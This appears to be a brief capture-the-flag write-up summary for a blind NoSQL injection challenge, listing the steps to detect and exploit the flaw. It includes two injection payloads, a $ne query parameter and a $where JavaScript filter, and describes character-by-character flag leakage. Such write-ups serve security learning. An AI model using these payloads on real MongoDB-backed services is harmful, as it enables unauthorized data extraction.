Tags: web nosql-injection
Rating: 4.5
This is a Blind NoSQL Injection attack.
1. Recognize the NoSQL Injection vulnerability using this payload: `GET /api/posts?title[%24ne]=`.
2. Develop an exploit that attempts to scan for the string “flag” in the post contents using the MongoDB $where operator: `/api/posts?%24where=function(){return%20this.content.includes('flag')}`.
3. The response returned for the above injection payload tells us that the flag contents have been redacted by the server. Develop a script that lets us enumerate the characters in the flag based on this response (see section titled Enumerating the Flag Alphabet).
4. Adapt the script from step 3 to leak the flag using the alphabet that we enumerated and the response of the server (see the section titled Disclosing the Flag).
5. `Pr0f1t!`
